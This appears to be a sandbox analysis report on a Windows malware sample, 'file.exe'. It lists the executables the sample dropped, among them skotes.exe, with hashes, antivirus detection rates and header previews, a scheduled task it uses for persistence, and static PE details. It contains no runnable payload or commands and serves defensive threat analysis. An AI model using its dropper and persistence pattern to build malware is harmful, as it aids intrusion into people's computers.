Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1889280
Entropy (8bit):	7.949881688030758
Encrypted:	false
SSDEEP:	49152:Ryb3ZFyKE++VdH6aEHghumWhcbzYP4cKsF+TJ9:ob3ZFm+mWpmWhtXLk
MD5:	385F0024661E626AD70879FA9EE43036
SHA1:	C079ECC579831275E5916B3FC62CE8F9D39D56FD
SHA-256:	32A05EE67598EC31904E4D39228EDCD8DDF12A9C96F213865C56F21CC19475E2
SHA-512:	39F0A62DF5DCA7D5A0150069EF52B0168D35EAF2214E709DA91B53E705BBDA68A5635D27F4F6B2E744C101430612153D4F3AF1024B7A61758D1AA48919A035CF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................K......:....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... .@+..@.......^..............@...zvacajzt.P....0..N...`..............@...acgxgepq......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	727552
Entropy (8bit):	7.888061454157426
Encrypted:	false
SSDEEP:	12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
MD5:	28E568616A7B792CAC1726DEB77D9039
SHA1:	39890A418FB391B823ED5084533E2E24DFF021E1
SHA-256:	9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
SHA-512:	85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......\|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4485120
Entropy (8bit):	7.987735628232052
Encrypted:	false
SSDEEP:	98304:7Im4EC94jZjOt8iFiTO7It1DbRQ08BUUnVZ4QEptUeS:7Im4Lyljq4OiNUoQB
MD5:	9A1A8278DE829A8B0430E9EB10174992
SHA1:	DB5E75650B198EE68A4BBDA6CC5C99EE7FD285B5
SHA-256:	2479F695F071147DACB05D89FDC0941CCBF65A28908EB8C8AA2DAEC5D1FDFC90
SHA-512:	D0A10BE724A09ADC4E22EB1B83A767C3BB9055CEC5D429AC1B3B98DF15D9F0685C8719CD7B5C0F4A0D2386579BBC346FD0426773F80320817004588AFFBC723E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L]g...............(..K..dq..2............K...@.................................}gE...@... ............................._.n.s.....n............................................................................................................. . ..n......@(.................@....rsrc.........n......P(.............@....idata ......n......R(.............@... ..9...n......T(.............@...xtfxuijo............V(.............@...svksalgd.............JD.............@....taggant.0......."...ND.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4434944
Entropy (8bit):	7.985681429555531
Encrypted:	false
SSDEEP:	98304:epfS5aW8WrAftsGPpR0prkAPNBSwCsvxmevTGZDPjDDyL:gfSAFVtpupwA7dCs4lhPv2
MD5:	178C04A423C791C51C0D91ED1177DBCE
SHA1:	8E277A9244112ABE7B8361DB8A7853342B701E8A
SHA-256:	D2557AABB49B968605CE2C00DE93DE926D7A25F49F6F693AD822AFF57C8A14B8
SHA-512:	70B219568B548F7A2EA1891DE180155F054E96D5EC61193922290C1D7F00F9BEBF9819A35B4F595FA830CD9CC4543E9A961DC429A168E9974518E74F9B8F20E0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._g...............(..H...t..2............H...@.......................... ........D...@... ............................._`r.s....Pr............................................................................................................. . .@r......6(.................@....rsrc........Pr......F(.............@....idata .....`r......H(.............@... .08..pr......J(.............@...ipikowml.@.......:...L(.............@...bmxpstlu..............C.............@....taggant.0......."....C.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	393728
Entropy (8bit):	6.004737079894222
Encrypted:	false
SSDEEP:	6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
MD5:	DFD5F78A711FA92337010ECC028470B4
SHA1:	1A389091178F2BE8CE486CD860DE16263F8E902E
SHA-256:	DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
SHA-512:	A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1889280
Entropy (8bit):	7.949881688030758
Encrypted:	false
SSDEEP:	49152:Ryb3ZFyKE++VdH6aEHghumWhcbzYP4cKsF+TJ9:ob3ZFm+mWpmWhtXLk
MD5:	385F0024661E626AD70879FA9EE43036
SHA1:	C079ECC579831275E5916B3FC62CE8F9D39D56FD
SHA-256:	32A05EE67598EC31904E4D39228EDCD8DDF12A9C96F213865C56F21CC19475E2
SHA-512:	39F0A62DF5DCA7D5A0150069EF52B0168D35EAF2214E709DA91B53E705BBDA68A5635D27F4F6B2E744C101430612153D4F3AF1024B7A61758D1AA48919A035CF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................K......:....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... .@+..@.......^..............@...zvacajzt.P....0..N...`..............@...acgxgepq......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1854976
Entropy (8bit):	7.945620493629233
Encrypted:	false
SSDEEP:	24576:LXxMkX4JFVvXWkDBhybHlVpKFhmOqgBvr0pyc3TXvg+DEjibUCLuEarCpy+2qW3G:9MkSFVZElVcFhVqgFrPo0+DriERQ2PL
MD5:	6B7CCA5A323F5E7087052DBE58F4C15A
SHA1:	F98A92658E8F8D25F689955B1F657FBCDC30D88E
SHA-256:	122C8FA6CEC8C75DEFF869AAD3EE031709E084C3C46BDB5BE25119F884B89FB3
SHA-512:	8D2E7398A2F5BE0044D91DCAA60F4E020BAF334D8D5C822DD777226295A21FEA78863C1AE806A3EA810DC9664858BFE75CDFE692E62DB31EDCE62F06C0B7C327
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*.......0k...........@..........................`k...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..+...$......\|..............@...qlmsecti.....pP......~..............@...gcgddbmv..... k......&..............@....taggant.0...0k.."...,..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3042304
Entropy (8bit):	6.555795534692422
Encrypted:	false
SSDEEP:	49152:ueMrqQKUp8LZi+HoXQYLNLVzKWlpB8Eobr:ZUsi+IHJxzXlT8h
MD5:	215688FC3175B17C270C29FE33195914
SHA1:	3880A4508834EDF56D14CD784660880F0EB012A3
SHA-256:	29851165599092069A369C86ECC491DFDE744C82CB6118C241B41D517D7E11FF
SHA-512:	117C595D12F83B751E2A7E7D56A37306DE09396043B6754C15AA5FF67AE78EA15F8308D7822FE61A63105CF0208BA3CC053D884C3B5D6623EA6DA9A3B8E35A19
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2......x....@.................................W...k.......D.....................1...............................1..................................................... . ............................@....rsrc...D...........................@....idata ............................@...dvclnttf.P+......P+.................@...migevdii......2......D..............@....taggant.0....2.."...J..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 09:04:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.981709159796883
Encrypted:	false
SSDEEP:	48:8CddTFZdHUiidAKZdA19ehwiZUklqehVy+3:84/Fay
MD5:	A8B8278291888695674CF685854833F0
SHA1:	0A13AE713D6FB3D402A351596E37FE40B0AD417D
SHA-256:	82643B5108310B82DB5CF8478C1A87441C5392460E486A060DB2C17F3A435646
SHA-512:	7AA108A6FB2DCE5DA1FACB9B9C6167B3D20D66E89F846557CA3FD47E1A48B1D2DF8F11ED8356229A3B0AB8B0D90C8308965F3FDB4F540143069EC56234A53C81
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....k..O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.P....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 09:04:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9968315233518363
Encrypted:	false
SSDEEP:	48:89ddTFZdHUiidAKZdA1weh/iZUkAQkqehKy+2:8t/f9Q/y
MD5:	B5DC870149CF698229B52FFC2D2D27D9
SHA1:	BDE13DA7857ABD020A5DA30B60AEA2CEB35C3558
SHA-256:	F99FD9D86081311B429C4FCBAED373E8392C0CA7E9C95462C162EC98E89C7008
SHA-512:	E921546E9A53FB06C5F03DDA50762D0DE314CF8A5EA9510AF61E25AA6939E40AC1CF7FF1603CBBABFE28DC65C0CEFFCCB0803A4AC2829304FE21D8104E3FB5A2
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,...."...O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.P....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.006843399418299
Encrypted:	false
SSDEEP:	48:8xSddTFZsHUiidAKZdA14tseh7sFiZUkmgqeh7sEy+BX:8xo/Aney
MD5:	C82090CEA43060E1DEF7E4AB5E52F481
SHA1:	90E339D7D440F8B85A143A723EB212B8169CA681
SHA-256:	DABC0CAF7B6477F92E9F1E7970F719C2718883879457CF716430ACEE94D65EDB
SHA-512:	996ACD6A005C6EA4141B423746A198A59EF6786B4A02E722C0915F98448B19BD950EDF33A850CD5B8293CAC9EE323C6FC52B212BF555985214CB32B651867D28
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.P....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 09:04:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.992799076169827
Encrypted:	false
SSDEEP:	48:8UddTFZdHUiidAKZdA1vehDiZUkwqehmy+R:8q/cMy
MD5:	B97B30C0C7C26E5F7CFBB55D5EC67167
SHA1:	61C79AB62B6667C897E89C8F274252C6E3CD601B
SHA-256:	96962811B0144678825FECD107ECBA9E8CF189E1E687C6402AD0D296D08E9CBC
SHA-512:	A00C404F0D86D426E00A4C13544C237D6632B6717A8BD70E6F7ED1095F1A2C13D334E4A55ED1018D25297BA611DF33526FFE28FC0E5AD7F2F27EE51B3C7D2038
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....r.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.P....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 09:04:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9847144933695042
Encrypted:	false
SSDEEP:	48:8DddTFZdHUiidAKZdA1hehBiZUk1W1qeh4y+C:8L/s9Yy
MD5:	43A11F4D6D08B4974957B3941B75FBD5
SHA1:	801B434D2F9D1F1D83B749E07B8B0746E4019031
SHA-256:	39F97C7BFFB0B656D083008350EB4319A6840A76312BB809AB275C04B9D846A4
SHA-512:	7A101FD0B52CD43E3151E82E818A0429EEFBDAA828F1E7E519189B3A8AA9F4BC49BEDCD21BC94596E3194279CD8FACBB94E52939AFB34DA02F86A24E9764F25B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....j..O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.P....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 09:04:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9932581689165962
Encrypted:	false
SSDEEP:	48:8VddTFZdHUiidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbey+yT+:8l/CT/TbxWOvTbey7T
MD5:	F74486A6E9DEF5195267C6D27A025E13
SHA1:	FF15D766C6F6EA2B10126400E07966388A1DAC71
SHA-256:	A130877CCB6BCC1E6E18DE0C7FB4E425CC3CEEEA1EACD978FF64EAF1842C037F
SHA-512:	3FA7FBC5C7668CDBAA58B23B02A6086C0C4AC2AAF2627CFBA064D4CE4D12FF0649CB1F03C4625AF0F49215CFF48DF4946129B96BDA18F9F95055D468B6574B78
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......W.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.P....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4209837530016207
Encrypted:	false
SSDEEP:	6:vEfupH4PtX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lM5zt0:cfu6ZuQ1CGAFifXVGt0
MD5:	6CA4D330CCA2FA0A980F258C567316CE
SHA1:	0A6E873B3545400601689353F674B121737704B2
SHA-256:	D3A9AE1742D70D2AD79E5E9B872B9798D5FB43B8F6AFB2C07C35BDAA5AA3F5C2
SHA-512:	B9F41642721009B281BE0C57A556A90A9B2AF16112C1B417DD93CD610E073D145CFF36835A7A24869D7A36D7816AE01EE6FBFB786B305F12D003F6B7F626B15F
Malicious:	false
Reputation:	unknown
Preview:	......:..K....G.'oF.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.555795534692422
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'042'304 bytes
MD5:	215688fc3175b17c270c29fe33195914
SHA1:	3880a4508834edf56d14cd784660880f0eb012a3
SHA256:	29851165599092069a369c86ecc491dfde744c82cb6118c241b41d517d7e11ff
SHA512:	117c595d12f83b751e2a7e7d56a37306de09396043b6754c15aa5ff67ae78ea15f8308d7822fe61a63105cf0208ba3cc053d884c3b5d6623ea6da9a3b8e35a19
SSDEEP:	49152:ueMrqQKUp8LZi+HoXQYLNLVzKWlpB8Eobr:ZUsi+IHJxzXlT8h
TLSH:	59E54963B509B6CBE44F22B88937CD837E6D43B9071409DBE86C71BA6E67DC015B5C28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x721000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB1DD19C7FAh
cmovp ebp, dword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax+000000FEh], ah
add byte ptr [edx], ah
add byte ptr [eax], al
